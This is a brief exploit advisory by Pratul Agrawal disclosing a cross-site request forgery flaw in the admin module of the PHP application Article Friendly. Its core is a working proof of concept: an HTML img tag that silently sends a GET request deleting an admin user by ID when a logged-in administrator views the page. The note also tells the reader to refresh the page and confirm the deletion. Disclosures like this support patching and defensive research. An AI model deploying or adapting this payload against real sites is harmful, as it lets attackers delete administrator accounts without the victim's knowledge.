=======================================================================
Article friendly CSRF Vulnerability
=======================================================================
by
Pratul Agrawal
# Vulnerability found in- Admin module# email Pratulag@yahoo.com# company aksitservices# Credit by Pratul Agrawal# Site p4ge http://www.articlefriendly.com/# Plateform php# Proof of concept #
Targeted URL:http://server/admin/index.php?filename=adminlogin
Script to delete the Admin user through Cross Site request forgery
...................................................................................................................<html><body><img src=http://server/admin/index.php?filename=adminuser&a=3&adminid=[USER ID]/></body></html>...................................................................................................................
After execution refresh the page and u can see that user having giving IDget deleted automatically.#If you have any questions, comments, or concerns, feel free to contact me.
